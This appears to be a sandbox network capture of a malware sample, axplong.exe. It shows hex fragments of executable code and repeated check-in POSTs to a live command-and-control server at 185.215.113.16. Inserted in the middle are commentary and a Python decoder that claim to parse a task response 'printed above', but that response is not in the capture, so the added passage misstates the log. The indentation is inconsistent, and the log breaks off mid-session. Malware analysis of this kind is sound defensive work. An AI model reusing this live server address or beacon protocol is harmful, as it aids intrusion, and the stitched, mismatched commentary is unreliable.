Sep 27, 2024 17:42:03.636379957 CEST | 1236 | IN | Data Raw: b9 00 00 00 00 41 b8 01 00 00 40 48 8b 4d 10 48 8b 05 a9 8e 00 00 ff d0 85 c0 75 07 b8 00 00 00 00 eb 65 8b 45 f4 89 c0 48 89 c1 e8 77 1b 00 00 48 89 45 f8 48 83 7d f8 00 75 07 b8 00 00 00 00 eb 46 48 8b 45 18 89 c1 48 8b 55 f8 48 8d 45 f4 48 89
    Data Ascii: A@HMHueEHwHEH}uFHEHUHEHD$ IA@HMHTuHEH:HEH@]UHHPHMHUH}tHEuHD$0HD$(HEHD$ AAHMH
Sep 27, 2024 17:42:03.636411905 CEST | 1116 | IN | Data Raw: 00 00 00 48 8b 05 09 26 00 00 ff d0 49 89 c1 41 b8 33 00 00 00 ba 01 00 00 00 48 8d 0d ea 3c 00 00 e8 b5 16 00 00 b8 01 00 00 00 e9 cb 00 00 00 b9 e9 fd 00 00 48 8b 05 cf 8a 00 00 ff d0 b9 e9 fd 00 00 48 8b 05 b9 8a 00 00 ff d0 e8 b2 ea ff ff 85
    Data Ascii: H&IA3H<HHuH<RWH7tH7H<2kiHEH*HEHHHEHPHHtHH7HH`H
Sep 27, 2024 17:42:03.636450052 CEST | 1236 | IN | Data Raw: 1f 84 00 00 00 00 00 e8 fb 0c 00 00 b8 01 00 00 00 48 83 c4 28 c3 90 56 53 48 83 ec 28 48 8b 05 43 3c 00 00 83 38 02 74 06 c7 00 02 00 00 00 83 fa 02 74 13 83 fa 01 74 40 b8 01 00 00 00 48 83 c4 28 5b 5e c3 66 90 48 8d 1d 69 a1 00 00 48 8d 35 62
    Data Ascii: H(VSH(HC<8ttt@H([^fHiH5bH9tHHtHH9uH([^H([^ff.f1HXHvHt,$L$ HL$ HT$(T$0\$8D$@HXff.
Sep 27, 2024 17:42:03.636497974 CEST | 1236 | IN | Data Raw: 00 00 00 4c 39 e6 0f 83 79 ff ff ff 4c 8d 76 08 49 83 c4 07 4c 8b 2d d8 37 00 00 48 8d 7d a8 4d 29 f4 49 c1 ec 03 4e 8d 64 e6 08 eb 0a 66 0f 1f 44 00 00 49 83 c6 08 8b 4e 04 8b 06 41 b8 04 00 00 00 48 89 fa 4c 89 f6 4c 01 e9 03 01 89 45 a8 e8 0e
    Data Ascii: L9yLvIL-7H}M)INdfDINAHLLEM9uGr1L%fH1rHDEtHPHHIAH(;r|NQVuVH8F-V/HL-7LuL9


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:05.050443888 CEST | 184 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 31
    Cache-Control: no-cache
    Data Raw: 64 31 3d 31 30 30 30 33 35 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
    Data Ascii: d1=1000359001&unit=246122658369
Sep 27, 2024 17:42:05.763284922 CEST | 193 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:05 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4 <c>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49740 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:05.885186911 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:42:06.584541082 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:42:06.586177111 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:06.810822010 CEST | 196 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0
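The exchanges in this section can be decoded straight from the hex "Data Raw" column: the chunked response at the top of the section carries a task block of the form " <c>1000359001+++<94 hex characters>#<d>", and in sessions 1 and 2 the bot (axplong.exe) POSTs "st=s", "r=<hex>" and "d1=1000359001&unit=246122658369" to /Jo89Ku7d/index.php and receives an empty " <c>" or " <c><d>" body. The Python below is an added example written for this page; it is not Joe Sandbox output and not code from the sample. It rebuilds the HTTP body from the hex dump, undoes chunked transfer-encoding and splits the "<c>...<d>" block into records. Calling the first record field a task id and the second a payload, and labelling the "st", "r" and "d1" requests as status, report and task result, are assumptions drawn only from the bytes visible above (1000359001 is the value the bot echoes back in "d1=" in session 1).

```python
"""
Decoder for the C2 exchanges captured in this report.

Added example for this page; not Joe Sandbox code and not code from the
sample. Input is the hex "Data Raw" column exactly as printed above.
"""
from urllib.parse import parse_qs

# Hex dumps copied verbatim from the capture above.
TASK_RESPONSE_HEX = (
    "37 33 0d 0a 20 3c 63 3e 31 30 30 30 33 35 39 30 30 31 2b 2b 2b "
    "61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 "
    "39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 "
    "61 39 61 37 32 66 66 33 66 63 66 65 62 36 35 38 35 34 62 62 62 63 33 31 "
    "32 61 32 36 38 39 32 62 63 61 30 62 38 38 66 37 36 63 61 34 39 61 23 3c "
    "64 3e 0d 0a 30 0d 0a 0d 0a"
)
EMPTY_RESPONSE_HEX = "37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a"
TASK_ACK_REQUEST_HEX = (
    "64 31 3d 31 30 30 30 33 35 39 30 30 31 26 75 6e 69 74 3d "
    "32 34 36 31 32 32 36 35 38 33 36 39"
)


def hex_dump_to_bytes(dump: str) -> bytes:
    """Turn the space-separated hex column into bytes."""
    return bytes.fromhex(dump)  # whitespace between byte pairs is ignored


def dechunk(body: bytes) -> bytes:
    """Undo HTTP/1.1 chunked transfer-encoding: <hex size>CRLF<data>CRLF ... 0CRLFCRLF."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)                # ValueError if not chunked / truncated
        size = int(body[pos:eol].split(b";")[0], 16)  # drop any chunk extension
        pos = eol + 2
        if size == 0:
            return bytes(out)                         # trailers, if any, are ignored
        chunk = body[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated chunk")
        out += chunk
        pos += size + 2                               # skip the CRLF after the chunk data


def parse_task_block(text: str) -> dict:
    """
    Split a de-chunked body into the <c>...<d> block and its records.
    Observed layout: " <c>" + zero or more "<id>+++<payload>#" + "<d>".
    Naming the fields id/payload is an assumption from the capture, where
    the bot later reports 1000359001 back as d1=.
    """
    start, end = text.find("<c>"), text.find("<d>")
    result = {"has_c": start != -1, "has_d": end != -1, "records": []}
    if start == -1 or end == -1 or end < start:
        return result                                 # bare " <c>" or malformed block
    for rec in filter(None, text[start + 3:end].split("#")):
        task_id, sep, payload = rec.partition("+++")
        result["records"].append({"id": task_id, "payload": payload if sep else None})
    return result


def decode_response(dump: str) -> dict:
    """Hex column of a chunked response body -> parsed task block."""
    return parse_task_block(dechunk(hex_dump_to_bytes(dump)).decode("ascii"))


def parse_request_body(dump: str) -> dict:
    """Hex column of a form-encoded request body -> {field: value}."""
    fields = parse_qs(hex_dump_to_bytes(dump).decode("ascii"), keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def classify_request(fields: dict) -> str:
    """
    Label a POST by its form keys. The labels are assumptions from the capture:
    "st=s" opens each session, "r=<hex>" follows it, and "d1=<id>&unit=<n>"
    carries an id the server handed out earlier.
    """
    if "d1" in fields:
        return "task-result"
    if "r" in fields:
        return "report-blob"
    if "st" in fields:
        return "status"
    return "unknown"


if __name__ == "__main__":
    print(decode_response(TASK_RESPONSE_HEX))
    print(decode_response(EMPTY_RESPONSE_HEX))
    req = parse_request_body(TASK_ACK_REQUEST_HEX)
    print(classify_request(req), req)
```

Run against the captured bytes, the task response yields a single record (id 1000359001 with a 94-character hex payload) while the " <c>" and " <c><d>" bodies yield none; a body that is not chunked makes dechunk raise ValueError instead of silently passing it through, which is the behaviour you want when feeding arbitrary rows of the capture into the decoder.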


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49744 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:06.931915045 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:42:07.959161997 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:07 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:42:07.959450960 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:07 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:42:07.960340977 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 154
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:08.188471079 CEST | 196 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49746 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:08.307951927 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Sep 27, 2024 17:42:09.083329916 CEST | 219 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Fri, 27 Sep 2024 15:42:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Refresh: 0; url = Login.php
    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 1 0
Sep 27, 2024 17:42:09.084280968 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:09.436841965 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:09 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49749 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:09.557512045 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.16
  Content-Length: 4
  Cache-Control: no-cache
  Data Raw: 73 74 3d 73
  Data Ascii: st=s
Sep 27, 2024 17:42:10.279664040 CEST | 219 | IN | HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Fri, 27 Sep 2024 15:42:10 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Refresh: 0; url = Login.php
  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 1 0
Sep 27, 2024 17:42:10.280847073 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.16
  Content-Length: 154
  Cache-Control: no-cache
  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:10.503495932 CEST | 196 | IN | HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Fri, 27 Sep 2024 15:42:10 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49752 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:10.619585037 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.16
  Content-Length: 4
  Cache-Control: no-cache
  Data Raw: 73 74 3d 73
  Data Ascii: st=s
Sep 27, 2024 17:42:11.326113939 CEST | 219 | IN | HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Fri, 27 Sep 2024 15:42:11 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Refresh: 0; url = Login.php
  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 1 0
Sep 27, 2024 17:42:11.327959061 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.16
  Content-Length: 154
  Cache-Control: no-cache
  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:11.552459955 CEST | 196 | IN | HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Fri, 27 Sep 2024 15:42:11 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49753 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:11.669706106 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.16
  Content-Length: 4
  Cache-Control: no-cache
  Data Raw: 73 74 3d 73
  Data Ascii: st=s
Sep 27, 2024 17:42:12.404237032 CEST | 219 | IN | HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Fri, 27 Sep 2024 15:42:12 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Refresh: 0; url = Login.php
  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 1 0
Sep 27, 2024 17:42:12.408096075 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.16
  Content-Length: 154
  Cache-Control: no-cache
  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:12.636272907 CEST | 196 | IN | HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Fri, 27 Sep 2024 15:42:12 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49756 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:12.745692015 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.16
  Content-Length: 4
  Cache-Control: no-cache
  Data Raw: 73 74 3d 73
  Data Ascii: st=s
Sep 27, 2024 17:42:13.506381989 CEST | 219 | IN | HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Fri, 27 Sep 2024 15:42:13 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Refresh: 0; url = Login.php
  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 1 0
Sep 27, 2024 17:42:13.507097960 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.16
  Content-Length: 154
  Cache-Control: no-cache
  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:13.733561039 CEST | 196 | IN | HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Fri, 27 Sep 2024 15:42:13 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49759 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:13.853938103 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:14.569432974 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:14.570529938 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 17:42:14.803164005 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49762 | 185.215.113.16 | 80 | 2304 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 17:42:14.916593075 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Sep 27, 2024 17:42:15.610800028 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 27 Sep 2024 15:42:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Sep 27, 2024 17:42:15.611680984 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 154
Cache-Control: no-cache
